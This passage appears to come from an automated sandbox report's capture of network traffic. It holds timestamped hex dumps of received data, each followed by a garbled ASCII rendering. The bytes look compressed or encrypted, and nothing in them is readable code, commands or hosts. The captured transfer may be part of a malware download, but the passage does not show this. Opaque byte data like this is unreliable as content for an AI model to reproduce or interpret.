4d 83 44 14 35 1d b0 55 81 17 6a 3d 86 1d 2b 41 9d ce 40 60 46 0f 1c a4 26 f4 ad 78 b6 ac 20 b2 0e 04 bc df 6a b4 f8 3f c0 a6 78 98 81 d8 2b 0c f0 21 0e f2 43 15 d7 00 2a 4c 61 5d 18 9c 9e a8 3d ec 1e 7b 6d 6a e4
                                                                                      Data Ascii: '0poLn~!,[mPU['=PM=As:U8~|kSf!5L:}xM_YPsd`\.P`su9<uN&MD5Uj=+A@`F&x j?x+!C*La]={mj
                                                                                      2023-08-04 16:48:39 UTC490INData Raw: 7b e4 68 bf 85 11 9b b5 07 e9 d5 32 96 00 34 d1 d6 ff b3 86 2f ad c1 fb 10 13 97 d5 a7 80 7d ca 38 8d 0d ea fa c5 8c 0a 42 23 dd cc 10 97 83 54 40 a1 6d a9 cd 15 8a db 34 e2 dd 3c 9e a8 65 dc 07 91 98 7f 4e e6 24 45 31 74 f0 01 ea 33 da 9d a2 4c 77 c9 60 20 b4 8a 14 a7 2e 1d 50 ec c8 82 c2 e7 45 ab 6b 51 11 0f de 75 36 c0 c4 eb 89 87 8b 9c 8d 67 03 0a 2b 4a e4 85 5d 04 45 52 d9 7a aa 72 e0 75 f4 27 0e 79 d8 dc 12 4c 94 12 e4 83 a2 be 2b 99 be bb 63 0d 92 63 a0 18 a1 97 9b f2 be 32 52 09 f6 13 19 6b ea 53 c7 cd 1d 14 46 70 6c 74 e6 1c 83 39 fb ca 1f ab 83 92 45 34 2d 31 16 16 30 e6 58 ab a8 cc cc 93 5a 5b 92 0f d8 13 42 e5 80 21 a5 ca ce 92 13 e6 34 b1 63 b0 36 79 94 c0 3b bc 66 a6 0a ef 49 19 a1 c7 4e 4d e5 79 13 cb a2 31 8a ee 08 f7 a9 cd 0f 68 76 ca 3c
                                                                                      Data Ascii: {h24/}8B#T@m4<eN$E1t3Lw` .PEkQu6g+J]ERzru'yL+cc2RkSFplt9E4-10XZ[B!4c6y;fINMy1hv<
                                                                                      2023-08-04 16:48:39 UTC494INData Raw: 3f 34 ff 3a f9 e7 74 dc 21 94 ff 3e 3b f1 29 bb b4 ae 5f 97 8a 37 da a3 13 72 5d 46 ad b9 b7 fd 13 3e a7 09 7c a1 0e a9 4a 31 c3 1e 56 3b 28 75 54 8f 33 f9 a6 8b 85 8e 65 71 4f 47 b6 ba db 8d 31 79 f5 b0 cc 9b 56 89 0f 21 c2 75 94 d7 0b ec f3 4e 71 fc da e8 d5 27 9b 8f e6 70 49 8c 53 cd 09 ee 33 04 2e 13 2b 27 f8 a4 8d 67 d5 ae be 10 8e b1 a2 8d 8a d4 cb 04 83 ff cf 06 0e 53 37 48 7d c7 fd 31 29 61 1c d8 c2 1a 6c e2 48 b1 e7 ff b2 e4 ac 69 7a cd eb 1c 73 c3 83 55 31 9b 33 ff ee bd 38 3f 9f cd 33 ca de 15 9a ab 90 e7 b1 3e b6 fa 37 7c a6 f6 64 d1 4d 79 18 30 1e 5f 5e fc 53 4d ca 52 6c 70 c8 0e 78 c0 bd 87 d9 3d c5 ce 60 82 91 aa a4 f6 98 05 d1 65 ed ca bd 16 73 db 2f 66 95 0f 97 80 4d 2a 2b c0 0b bd 96 84 49 0f cd 00 86 0b 3e 8f 55 bf 78 68 dc d0 cf 54 90
                                                                                      Data Ascii: ?4:t!>;)_7r]F>|J1V;(uT3eqOG1yV!uNq'pIS3.+'gS7H}1)alHizsU138?3>7|dMy0_^SMRlpx=`es/fM*+I>UxhT
                                                                                      2023-08-04 16:48:39 UTC498INData Raw: f4 8e 6a 3b ca c5 1f 7a 79 c6 e4 a9 40 f0 97 c1 3e 54 66 6b 3b 19 2b 37 2a 43 e9 2c d2 e5 16 38 b3 8e 36 31 51 6f 9f 55 5f 33 39 1c 82 2a f9 7e 97 e9 8b e9 c4 de 8a 2f 7b 22 84 e5 f7 1c 26 9a 40 69 d6 4b d4 0d c8 09 a9 40 4f b2 09 70 b7 50 60 1b 5e ba 4b b7 99 88 31 cc 9a a6 81 dc 5a c9 90 bd ae 43 2b 5d 3c ce b3 61 3b c3 51 c7 4b 20 c8 d3 ea ce b9 cb 98 99 f5 00 0b bc 73 b9 49 a7 27 92 c1 c9 b4 1a f6 9d 94 0a 45 e6 77 84 4a d4 cf a9 12 8d a2 ba 89 d0 06 13 78 dd a5 93 d4 da cb 2b 14 a2 27 36 8a cb d7 e2 e2 e7 7e 86 9b b2 1e 50 c8 7e 53 d2 9b 94 11 dd 35 f0 87 d5 b4 11 21 36 98 49 0d 36 27 bd 5e 38 08 3c 9a 25 ea 0d c9 24 5f 65 a9 0b fc 39 80 29 31 dc 09 14 f5 5a 8d 85 a9 a9 3f df e8 d3 d4 3f 12 ce 2f ea 0c 8f 6a 8d 44 b3 60 3e b7 cc 98 28 40 05 32 5c ee
                                                                                      Data Ascii: j;zy@>Tfk;+7*C,861QoU_39*~/{"&@iK@OpP`^K1ZC+]<a;QK sI'EwJx+'6~P~S5!6I6'^8<%$_e9)1Z??/jD`>(@2\
                                                                                      2023-08-04 16:48:39 UTC502INData Raw: 22 66 e1 7f fe ae 7d aa 1f 89 d1 09 5c ce aa 0a df 68 81 01 f2 ac 9a 19 50 e2 2a a3 90 46 5f 17 c9 d0 01 d5 27 ea b1 b0 5e 08 33 a9 fe 1f 2c ed ed f3 5d 17 7d 84 6d 7e 7f 08 e3 56 bd 54 86 d3 79 f1 d2 ad 47 0e b5 6d 02 e9 38 54 f2 30 5a 06 58 63 14 ba d2 43 c0 38 30 a0 00 21 cf b1 b9 d5 fd 41 70 30 d0 f2 de 69 57 6b 2b f4 7f 16 a6 25 cf 9f 4e 4a 38 2a 0b a9 39 79 6a 25 2f a7 87 28 bb cf 8e 66 08 d2 97 62 cd 59 4e e9 84 4d d9 a5 ce 1b 7a 05 91 5b 04 0d 48 4c d3 83 e0 44 6a bc fc b0 28 c2 cd 86 c8 9d f7 93 82 5f 00 48 e7 8f 5e 30 bd f8 b1 03 9a f7 9b e4 08 f6 36 4d fd ce ec ae 54 94 80 dd bb dc db 0b fb 98 39 43 1a 54 da 80 c6 d4 cf 7e f8 50 9f 3b ec a6 5f 6c fd 3e 05 17 30 a6 03 bd b4 da 10 09 ae 02 9a 65 8b 0b 2d 84 ee 6c 07 cd 05 4f 81 6d e6 2d c6 34 7e
                                                                                      Data Ascii: "f}\hP*F_'^3,]}m~VTyGm8T0ZXcC80!Ap0iWk+%NJ8*9yj%/(fbYNMz[HLDj(_H^06MT9CT~P;_l>0e-lOm-4~
                                                                                      2023-08-04 16:48:39 UTC506INData Raw: ea 32 ac 0c 67 77 e5 ca 4c 19 c8 33 fc 66 69 2d 67 a9 d7 21 c0 7f fa e2 63 31 1b fb fb 67 85 4c ac da a5 52 e6 13 c5 f8 01 5a 97 42 f7 73 5f 82 2e d0 d5 fd 72 57 12 d3 3a 60 94 9c f1 98 d0 40 2a 5b 79 7c c5 e4 69 37 39 e9 db ec a0 ec 06 27 9f f4 d5 92 80 23 e9 0e 75 6d e4 f9 90 ad ad d7 c3 8c 4c 05 97 2e da a8 65 3d 02 5e 74 90 29 58 11 60 e4 fd 5f 27 5d 60 12 1d 35 97 d7 5d 22 59 16 d2 f3 aa f4 ce 34 71 0c ec 45 3b e6 aa ee ad 20 2d 44 b1 4e 8c 79 c3 8f 4b 8b 9d 9e 5d 6f da 4e eb 21 0a f9 f8 97 7c 78 41 ac e7 3b bd 14 13 2c ee 8c b5 18 48 b8 25 33 56 05 6b 91 c5 9e 58 60 77 5d 3e bc 08 cd b0 a6 aa 18 ca 73 3d 26 36 c7 2f 7a fc 4b 4c 98 29 af de 57 06 1d 65 ee c9 3b b4 84 4d 65 d3 a4 07 64 77 12 c2 e9 83 71 27 9a 87 d8 79 5c 32 e8 e7 4f 14 07 31 bf bf 87
                                                                                      Data Ascii: 2gwL3fi-g!c1gLRZBs_.rW:`@*[y|i79'#umL.e=^t)X`_']`5]"Y4qE; -DNyK]oN!|xA;,H%3VkX`w]>s=&6/zKL)We;Medwq'y\2O1
                                                                                      2023-08-04 16:48:39 UTC510INData Raw: a5 9b 0f aa ba f3 72 31 c0 29 d2 eb 1d 8a c6 fc ea 35 c2 21 81 1d 0f c8 2b 5b 4b 71 73 e4 58 77 b0 c6 c4 69 2e cf 34 60 3d 2e c0 7e 03 d3 0e e6 bb 3d 5c 71 2b 85 40 31 14 61 1e ef b5 1e 01 23 02 f9 24 1c 5f cb 04 aa 97 1f f3 59 cd 71 3c e6 a5 56 1b 3d 74 7e 4f 19 fe 00 48 7a 1c f6 65 9d 4e 83 bd 07 c5 15 07 63 db 97 49 dc b9 20 e1 0f 17 4a ae 79 9d 4f 08 51 50 bc 7e 5b bf 08 8c 37 6c 1a f7 ed 5b 09 1c 9c b7 10 c1 74 29 8c 51 ef 48 97 61 8b 51 ac ed 55 17 fe f1 18 9a aa bb 05 a2 33 83 cc f3 aa 26 fa 38 80 da 91 d6 d8 57 c5 cf dc 74 60 31 f8 9e 74 fd 17 21 4b 40 88 b5 ec 8a 3f 01 e2 45 4e c7 7a 7f 04 b7 68 3a 50 1d 27 2a b7 57 65 6e c7 ca 96 ba 24 3f b8 c8 88 25 ac 1d 0c 8b 37 08 aa 29 07 a1 b4 28 b2 5e 3c 5f 98 40 d8 91 53 b8 b1 24 ff 70 71 0b 01 ea 23 a1
                                                                                      Data Ascii: r1)5!+[KqsXwi.4`=.~=\q+@1a#$_Yq<V=t~OHzeNcI JyOQP~[7l[t)QHaQU3&8Wt`1t!K@?ENzh:P'*Wen$?%7)(^<_@S$pq#
                                                                                      2023-08-04 16:48:39 UTC514INData Raw: 48 25 88 11 33 17 e2 ec c7 80 33 6c 02 68 79 c6 0e 73 1e 50 7b 6e 66 e3 9a fd 31 f9 d7 4d 08 3a 71 9f fa 48 73 64 5d 22 26 3c 89 15 0b 5c b3 64 cb 45 b1 3a e5 a6 b6 ef 1b 2a dc 0e 77 f6 54 94 b3 f1 11 d0 09 cb 3a c4 8e fa 65 1f 3a 76 4c 76 c1 f0 96 cb 0d 46 0c cb 8e 97 86 6e fb 17 11 f0 35 3e 19 3b ea 63 23 d9 3d 1f c4 46 bb 40 97 9c f5 74 42 63 d3 ca 24 0b 76 af 5a dc 44 8b eb ff 68 02 49 4d 10 de 1a 33 3a c6 45 0e 17 19 2e e9 5e 3c 22 f4 2d 52 51 ce 63 af e3 27 c8 fa a0 9b 10 bf 9d 6d de b0 c3 ae cc 6d 2b 32 31 2a 05 12 2a ff 4f 1f 42 bf 3f 00 f6 13 76 cc 26 36 f4 5a 8d 7c a0 6d 16 aa 3b aa 58 13 49 b5 63 6f 4f ba 51 29 5b 3d 6b d8 a3 ba 87 13 22 23 85 4f 96 74 70 e1 dd c8 14 70 c8 70 fb e3 44 e2 4c 0e 13 0e 10 fd b1 ec 57 eb 9e 97 3c 81 c0 b7 4f 8b 37
                                                                                      Data Ascii: H%33lhysP{nf1M:qHsd]"&<\dE:*wT:e:vLvFn5>;c#=F@tBc$vZDhIM3:E.^<"-RQc'mm+21**OB?v&6Z|m;XIcoOQ)[=k"#OtpppDLW<O7
                                                                                      2023-08-04 16:48:39 UTC518INData Raw: c5 50 28 db ee a6 a0 08 8c 34 7a 80 c6 2a 6b df 8c d8 e9 01 75 e5 7d 88 f6 20 10 e8 a6 3d da 77 6d f8 c3 39 75 dc 34 bc f8 6a 1b d6 df 09 59 03 08 d5 2b 09 df 3e 63 36 f3 fc 59 a5 a9 36 6c c1 d3 f9 38 f5 1a 5b a5 af 80 0c 21 8a df 9b 41 da 50 1d 42 c6 d3 7c 0a 2d 1f 8e 82 41 66 4e 69 9c d9 c4 01 48 8f 8f 23 71 a4 43 df 80 c4 f8 c9 4d e4 ac 7c 81 c3 20 e4 2d e8 ae 77 e7 43 9f 70 85 6a 00 e5 9f a5 3c d1 2f d9 ef 91 71 de f0 ab fd e8 0c dc 06 3c 7e 2d 24 6e 26 bd 53 8a 8b 3d 81 4c 1d f8 71 7a b2 72 5a 74 11 c6 66 b8 00 ff 84 ad 19 55 d7 36 83 d6 4a 97 f5 d0 52 4c a3 d3 0c 99 bc 5c f5 b5 81 36 21 6a 0d a3 27 4a 49 52 4a c3 15 85 07 27 27 ea f7 50 aa 07 5e 41 17 d4 fd c6 07 52 f3 db 5c 64 d3 52 42 ad 0f 09 0e e8 75 33 aa 47 c8 f8 dd 69 01 c0 f4 90 3b 79 c6 1b
                                                                                      Data Ascii: P(4z*ku} =wm9u4jY+>c6Y6l8[!APB|-AfNiH#qCM| -wCpj</q<~-$n&S=LqzrZtfU6JRL\6!j'JIRJ''P^AR\dRBu3Gi;y
                                                                                      2023-08-04 16:48:39 UTC522INData Raw: 34 22 48 fb 02 82 1b 66 b7 89 02 7f 31 10 72 e1 d4 3a 95 87 30 67 a5 5e dc f3 f1 60 a3 be aa 3a 45 c0 1a 9f 6f 16 0b ac 53 4a 0b b7 7f 74 cb cc 41 64 4f bd 18 9d 4d cb 2c df b9 18 d6 b5 4b fd 4d f4 99 ce eb 70 27 df 0f 05 f6 77 37 5a 6c dc 7d ba 92 81 54 f4 d2 6d 3e 32 d9 c6 bb c4 32 a8 36 09 37 6a 7b bc 17 61 d8 8e f3 8a 93 ee f5 01 2e ef b8 15 72 6d 3e 8b 9a 0f fd df 33 3c c5 70 b6 f2 dc 68 4c f2 c3 df d3 73 b0 8b ac 5c 09 ff 21 5d 16 15 9e dd f9 36 b6 f5 74 24 11 6e de 07 7a f5 34 df b3 d7 23 66 81 94 e6 07 ad f0 e0 29 68 d0 b4 4e a6 ae a8 28 6c f0 d8 a2 42 2b 46 13 2f 0a 89 f1 50 f8 ab 24 d2 0c e9 3b 31 fb cc 11 ec ab 5a 0b 66 f8 c7 9d fa 97 4f 26 f0 5b 76 dd a4 6f b6 ea a2 db 55 c1 ea 1e bd 51 b5 6d b4 d9 31 ee 42 70 3e 49 40 e1 90 8c e2 7b 63 ef 15
                                                                                      Data Ascii: 4"Hf1r:0g^`:EoSJtAdOM,KMp'w7Zl}Tm>2267j{a.rm>3<phLs\!]6t$nz4#f)hN(lB+F/P$;1ZfO&[voUQm1Bp>I@{c
                                                                                      2023-08-04 16:48:39 UTC526INData Raw: a9 6d 0e 9b 04 96 64 eb f6 e2 0b 70 8b 33 dd 25 76 5f 70 7b 3e b3 7d ac 47 dc 14 56 0c a4 82 cb 44 71 6d fd bb ba c4 39 71 2b 4d ad af b8 3a e6 96 87 c5 e4 fb f6 96 05 bc 98 51 d8 08 bd 80 33 45 67 e1 a8 40 b4 4f 91 00 1a 97 13 d0 45 12 5b f9 20 24 0b 37 c4 62 16 fa 22 c6 4d 11 48 62 c9 a6 73 ad a2 7b 7d fe e7 9e 63 1a 0b e3 0d 25 af 6d 75 8e e7 73 f7 cf dd 29 68 95 d7 0e a9 47 13 5b ab 64 2b 55 4b 24 7c 84 97 63 e2 60 f7 b0 f5 57 5e b0 63 9d ca 8c e5 07 50 4a ca fb 48 a8 a4 4f fe 64 83 ad 7d b4 2f 68 21 4c 3d af 94 5c 9a 26 55 bc 73 15 aa 6a 8d bd 25 9b 05 15 50 72 e9 25 8c 85 ed 4f 5c 6a c2 bd a4 a8 a1 19 e1 8b 7d 45 53 7c 5b e3 b4 5f e9 2e c9 4b 4a 2c 26 35 8a db e9 17 1e 0f 83 e7 d9 84 74 74 a5 b3 e8 b5 8e 57 88 8b 6e cb 56 b3 09 c6 fb 5c f6 90 17 ad
                                                                                      Data Ascii: mdp3%v_p{>}GVDqm9q+M:Q3Eg@OE[ $7b"MHbs{}c%mus)hG[d+UK$|c`W^cPJHOd}/h!L=\&Usj%Pr%O\j}ES|[_.KJ,&5ttWnV\
                                                                                      2023-08-04 16:48:39 UTC530INData Raw: 96 fe 31 7f 7c 38 5a c5 ca 45 14 ba cf ab 58 de b8 24 3a 7c e6 dc 7d 46 c6 8a 15 58 1b db dd da 9f c8 cc 0d 8d 79 31 f1 94 65 90 10 55 c7 7e fd b9 fe 77 53 df 6e cb ca 6e 18 32 35 1f 7c f5 96 83 5c 7b 90 6f 4d af dc 94 7f 48 6e 13 90 ba 13 6a 79 2d ea bb 83 a4 a1 28 54 42 92 12 0e 14 57 c2 12 bc 06 fb 3d f5 f6 76 35 31 e8 36 e7 61 54 80 39 b7 51 aa 3d 07 2b 30 00 23 7f 72 47 b4 6d 67 7f 4a 5e bd 92 96 9d f7 7d 5c e6 35 e5 77 52 6c ac 7f ad 56 72 15 6e 49 fc 2c 7e 4b 78 54 71 93 50 c0 b7 f9 2c 4e 9f 78 71 e6 e7 2e 56 69 25 da b8 ff 7a e9 d5 c5 c3 60 e2 4e 5b a1 06 b1 36 4b 8c af db f2 8c 82 ba 7f e3 33 59 06 58 5c 22 5c 0a ff d1 90 63 ed 83 2c 57 7b 52 10 67 6e 14 21 d8 33 8e 47 92 94 55 1a 3e 45 df 07 66 9c 9c 84 9a 77 63 33 fa 00 b5 28 48 bb 3d f0 ce fb
                                                                                      Data Ascii: 1|8ZEX$:|}FXy1eU~wSnn25|\{oMHnjy-(TBW=v516aT9Q=+0#rGmgJ^}\5wRlVrnI,~KxTqP,Nxq.Vi%z`N[6K3YX\"\c,W{Rgn!3GU>Efwc3(H=
                                                                                      2023-08-04 16:48:39 UTC534INData Raw: 26 5f d1 a9 13 7d e9 bc a5 93 b9 14 42 21 e5 87 b1 af 1a 68 36 95 d7 fc fb a0 71 a8 e7 2c 8d fd fb eb 7c 86 ba c5 c4 f9 47 ec 29 ea 7e 87 8d 75 25 a3 cd e8 9d 00 3c e7 a2 87 95 86 f7 47 7b da 5a 31 96 3f 88 f8 c9 b7 0e b9 31 85 34 70 21 ac 75 11 d8 ba 47 48 b5 a3 88 6f 2a 7a a5 e4 0b 93 be ff 5c fe 81 ec d2 60 6c 54 af 6e fe a9 3e 62 e6 ef 40 22 64 5e 2c 2e 3d 5c 37 ee 33 cd 92 b7 f7 31 ca e9 60 c6 39 32 33 52 c5 a8 61 55 e9 8d 94 3f 42 96 5f 57 d2 ca 36 36 6b ac 0b 51 4a cf 4c 67 c3 7a 4d a4 d3 89 0c 42 11 7b ac a0 4c e9 28 01 9e df a7 55 79 35 b5 18 a5 93 92 9d 56 3e 35 63 7d 1b e5 a6 26 68 66 fb 36 26 38 81 0e b6 27 f5 39 29 fe cf 6c e7 5a cf c0 1c ac ba 21 c8 7d ff 38 f1 2d b6 c1 3b 47 82 fc a5 ff 5b e8 20 f9 c0 a6 56 3d cf 94 27 8a b0 ec 20 6b f3 2e
                                                                                      Data Ascii: &_}B!h6q,|G)~u%<G{Z1?14p!uGHo*z\`lTn>b@"d^,.=\731`923RaU?B_W66kQJLgzMB{L(Uy5V>5c}&hf6&8'9)lZ!}8-;G[ V=' k.
                                                                                      2023-08-04 16:48:39 UTC538INData Raw: 58 d3 6f 9a 62 f6 79 6a 4e c6 2f 4a cb 75 0a 6f 85 6b 7b bb 3c f9 e7 bf ad a2 44 f8 90 46 62 b3 62 53 29 89 0c a2 89 8d 09 87 8b 95 a9 d9 45 21 49 bc c3 f7 56 d3 c6 1d 0e ce 65 f7 98 68 55 d7 c9 5f 27 fa 63 c1 4e a3 ee d3 7d 76 9d f7 9a 37 80 af b3 ed 21 15 d9 7d 68 10 62 f5 bd 78 06 fe 33 56 30 79 f5 5c 37 bf f8 c5 36 8c 0e c5 7e cb 3f 6e 5a 52 c5 5c c7 75 e4 2e 8a 9e 38 ba 2b 29 2e b0 66 f6 db dc cd 6e 1d c7 87 0b 96 80 1e c5 6a 5b 1c 66 cb 26 d6 c8 b5 8b 09 52 4e 05 0d 44 61 79 40 f4 dd 1b 9a 01 97 a8 17 b2 99 52 0f 57 06 5b 22 b4 9d 6f 37 fc af d0 ea 3b 52 dc 09 69 f1 ab e6 11 55 96 72 7b 5f 92 c5 b9 a1 11 55 a1 ab f4 8f df 15 72 97 45 04 ec 12 20 cc ca 2e a5 89 b4 d0 df 6a 63 58 e3 bf e4 3f ba 08 39 2d 96 e1 2c 98 ee 0d 1d 80 3a fc 8e b9 ce 31 8d 3c
                                                                                      Data Ascii: XobyjN/Juok{<DFbbS)E!IVehU_'cN}v7!}hbx3V0y\76~?nZR\u.8+).fnj[f&RNDay@RW["o7;RiUr{_UrE .jcX?9-,:1<
                                                                                      2023-08-04 16:48:39 UTC542INData Raw: af dc 97 30 42 ce ca a1 6d ff 69 22 5e ae 0d f0 65 04 8c 71 bc cb 25 68 ac 0b 7a 7a 36 53 98 fc 1a a8 1d 95 ec 3a 00 0f cd 4e b1 b0 15 82 c7 57 fd db de 1e 86 c3 66 d4 96 be a1 81 38 d8 df 51 b1 32 88 45 a2 61 dd 9a 37 d8 40 bf 40 d4 ab d3 3a b9 dc 32 70 d7 ca 5b 70 ba ab cf fb 68 91 ad 40 94 f0 2e 7b d9 b2 ac ba a4 1f 05 95 bc 9d 52 fc a7 61 fc 96 2f 56 13 e5 c6 73 3e 99 32 d8 44 dd 24 2c 18 e1 b1 0c a7 22 83 cc 0e db 90 b7 02 54 99 e7 da d0 23 32 e6 3b 90 eb b7 ce bb 4e e8 5c 63 de 86 ea 32 8e 75 7f 2a a0 b3 cd f0 e3 02 4c ab e0 40 46 5e a8 9b f4 45 f1 f8 7b c8 13 c1 24 11 f1 66 b1 d8 04 c5 34 de 90 8f bf 7a 3f e9 47 24 9c a1 7f de 2b 3d 76 69 f7 a8 39 18 19 7b 15 e8 d3 21 e2 9b d4 96 85 17 4d 67 9f 39 d1 8e 36 9e 88 1b 51 71 71 89 3f 9d 75 74 ae e3 58
                                                                                      Data Ascii: 0Bmi"^eq%hzz6S:NWf8Q2Ea7@@:2p[ph@.{Ra/Vs>2D$,"T#2;N\c2u*L@F^E{$f4z?G$+=vi9{!Mg96Qqq?utX
                                                                                      2023-08-04 16:48:39 UTC546INData Raw: 7f a7 4f ce d1 98 15 fa 9b dc 3d 7c 65 7e 94 30 ce a9 3d d3 3f 9f 29 b9 fc 3e 50 81 d5 21 56 cb 7d c9 bc 46 36 c8 13 93 39 85 89 e4 33 71 47 56 9c 99 ac f9 f7 f4 b1 41 0f cf a7 f8 25 e5 04 48 53 b3 98 de a1 b9 3d 87 43 ec 34 b3 d2 f7 63 d9 30 4d ef a9 25 18 17 cc 7c 3e ba e1 cf 13 6f 28 96 35 d6 75 06 9f 8a 9b 07 08 4a 80 23 40 42 05 68 ea 0d c0 01 37 a8 cf 91 f1 ba 95 77 73 63 57 66 bd 95 d3 7f f5 98 22 58 30 b1 92 43 00 97 d4 f3 11 7b 8c bd ea 92 21 06 26 b3 b5 0f 2c 9f 5c a5 cc ce 11 e0 2a 58 21 99 38 bf f0 7a 31 aa 7a 10 de be 2d 28 01 fc eb 33 92 63 b9 c4 db e4 8a 65 49 5f 81 24 7c d5 fe 97 f2 3f 22 1e 19 66 e4 c1 b6 3e 01 f1 aa d8 f3 42 a0 9a ed 28 ad 23 71 de e1 d3 aa 33 7d 9f 0c 93 9e 3a b4 b0 36 70 7a b2 8b e6 ae ee e0 7c d5 78 28 e5 e4 94 90 0d
                                                                                      Data Ascii: O=|e~0=?)>P!V}F693qGVA%HS=C4c0M%|>o(5uJ#@Bh7wscWf"X0C{!&,\*X!8z1z-(3ceI_$|?"f>B(#q3}:6pz|x(
                                                                                      2023-08-04 16:48:39 UTC550INData Raw: 50 02 ef 5f ca b0 63 6b 8c 66 9c d0 8a 9c d3 a8 72 a6 12 f0 f4 5f 20 00 c1 96 62 d0 5f 70 1a 10 e2 51 44 a4 72 9a 70 22 de 9c cc a0 16 f7 98 d4 0f 32 fe 38 f6 37 91 73 d7 6d 1d b7 f7 9c c3 92 1c a8 18 6b 92 39 68 88 84 14 a7 bb 6c f7 50 4a d8 66 94 e4 0e 57 8b 3b d9 18 ac 73 d3 0b 36 72 bc ae 06 26 7c 5d 93 a1 7c 2f ea 40 65 6b af 2a 64 a1 11 4d 6e 35 ff 15 ea 64 49 01 ed fd 49 e6 42 51 34 ae 4b af dc f6 97 6a 66 ff 7c c8 4c 43 77 2c cf 82 f5 54 4d b6 3a c0 c8 fb 8b b8 17 53 ad cc db 99 c3 14 6c 15 76 35 47 ab 07 b5 50 f4 22 a4 40 d1 5b a5 9d 50 80 4f 6e 6f 64 4c df 1f 85 4d 2b 7f cc 88 21 a6 96 53 64 cc 2f 8b 63 bc 74 d9 98 45 ea 08 73 32 8e 2a 55 4e f5 bb cf e3 54 81 40 10 9a c0 aa 78 7b 63 5e 85 1e 66 60 80 8b d8 c3 15 dc 5c 0f 27 b3 c8 72 1e 5c 5d 62
                                                                                      Data Ascii: P_ckfr_ b_pQDrp"287smk9hlPJfW;s6r&|]|/@ek*dMn5dIIBQ4Kjf|LCw,TM:Slv5GP"@[POnodLM+!Sd/ctEs2*UNT@x{c^f`\'r\]b
                                                                                      2023-08-04 16:48:39 UTC554INData Raw: 5f 9c 00 7d a7 94 86 3e 85 f8 d3 89 6a 64 03 e8 b7 2a 06 08 42 62 c4 ec 29 54 ee 65 31 86 85 5b 3d 5e 22 b4 a1 28 af b1 eb f8 4e 29 b3 d1 a8 38 b1 7e 36 11 4a 8f 87 a8 c3 18 de 7c 60 f3 c4 45 bf 1b a2 2f 3d 03 4b 63 c4 24 8e 49 a0 7e cb 39 7b 58 c6 42 a2 18 6c aa 7f 5e a6 31 22 08 b1 63 e0 75 47 bb 61 39 96 6b 7a e6 46 4f ae 2b 46 da 69 ae d2 db fd 1d 77 67 3d 03 9f dd f8 15 ad 15 ce 7c 99 98 c5 8f 08 53 39 03 ba 3d 83 14 7b 8e be 08 2b 5c 7e 13 a4 88 bf 59 fe fa c1 8a 28 e8 e7 2e 43 aa 57 7b f8 76 d6 c5 94 76 b0 30 5e 52 e0 45 97 ed 08 72 8d 0d 5e ff 2f 34 68 5e 5f 0e ad f0 9d 9c 86 1a 3e c5 59 e4 62 4e d7 04 c8 46 3e 3e c8 e9 0e b8 c0 d9 b7 8e 0f c8 50 ac 84 28 3c ad 5c 8d b1 2a 08 2b 08 32 03 28 b9 23 4d 76 cb 06 42 cb 70 f3 21 db cc d0 5e 70 a5 70 26
                                                                                      Data Ascii: _}>jd*Bb)Te1[=^"(N)8~6J|`E/=Kc$I~9{XBl^1"cuGa9kzFO+Fiwg=|S9={+\~Y(.CW{vv0^REr^/4h^_>YbNF>>P(<\*+2(#MvBp!^pp&
                                                                                      2023-08-04 16:48:39 UTC558INData Raw: 79 79 d9 e2 5f a1 70 70 ae 74 6c 2a 34 8d 88 8f 73 88 5c f6 69 48 79 76 3d 1e cd 2a 15 ca 76 f7 20 10 60 8e 2f 26 27 af ec ad 93 86 0c f0 9d 8e e8 f1 f7 13 ac c9 45 e5 7c a3 f9 32 18 92 23 18 87 98 be 87 df f8 f2 61 95 de 9a 8f f6 f4 af d8 2f b4 e7 4c ac a1 76 86 6c 37 49 c8 95 1d 11 96 3a b9 b5 7a ca 87 e7 2a 5f 49 12 e7 da 07 4f 7e d2 b2 c9 75 26 85 0b 4b 4a 6b a1 6b 9b 9d 33 5e c3 b6 76 a9 2a 99 ca b3 73 b1 9c c2 44 a6 fe af 6e db a3 17 79 7e 77 3b b1 6b 0b db d5 50 7b 6a e4 36 54 c1 9e cd 72 57 59 c2 68 0f a4 34 e8 53 e7 c5 6c d8 ca de b3 1a d1 ec aa b6 66 41 3c be ac 45 fc 69 b4 de 4a e9 78 bc fd a4 3d 26 b1 3d d4 0d d2 2f a9 ca 0d e2 63 a9 92 8d 8d 30 32 cf a4 79 96 10 ac 46 6b 20 02 4f d1 66 e3 21 f3 69 7b 8d f0 5f b0 f7 46 bc 23 d7 36 0d cc 76 3a
                                                                                      Data Ascii: yy_pptl*4s\iHyv=*v `/&'E|2#a/Lvl7I:z*_IO~u&KJkk3^v*sDny~w;kP{j6TrWYh4SlfA<EiJx=&=/c02yFk Of!i{_F#6v:
                                                                                      2023-08-04 16:48:39 UTC562INData Raw: 15 9a fc 00 20 4f d6 61 c6 db b4 94 d9 f3 ba e8 63 a1 f5 ce 43 1e 94 d8 c9 30 e2 85 d2 14 b4 8f 1a d9 a1 11 83 67 0b 40 1e d3 8d 1a 67 69 18 27 f5 cc a4 47 1b 14 5c f2 27 65 47 bd dd db d3 12 9e 40 25 60 ed 1e 30 df 77 7b 51 df 72 c0 b0 c3 9c 94 b1 79 fe e7 23 a2 e1 e4 0d 11 a3 fe 00 e8 21 7a ca ca f1 7b 99 6e 66 6e 5b c0 17 53 34 a9 21 e6 0a 02 a0 0b ad 56 0e e8 b8 be f2 1d dd e8 63 4a 5e a1 8e 5c 62 1c db ba dc 55 7b 5b dc cd 9e c2 b4 05 68 0d 34 3b 66 1f 23 b0 45 75 57 d7 03 f8 b5 59 ad 09 cd 86 1e ae 5c 93 1d 27 45 f4 57 92 55 73 0a cb 08 a0 6c 21 15 be 6b f0 87 1b 8b fb 6a 5c 54 d8 ce d3 c6 f8 a7 54 eb fa 02 12 16 ee 60 7d 23 e5 ff 87 49 6f 4a 21 24 83 a9 dc 94 65 9f 68 b2 7e f9 54 c7 28 af f8 32 4c bb ca 6d 68 cb f7 4d 2a b4 c6 36 ae 7c d6 4a 44 36
                                                                                      Data Ascii: OacC0g@gi'G\'eG@%`0w{Qry#!z{nfn[S4!VcJ^\bU{[h4;f#EuWY\'EWUsl!kj\TT`}#IoJ!$eh~T(2LmhM*6|JD6
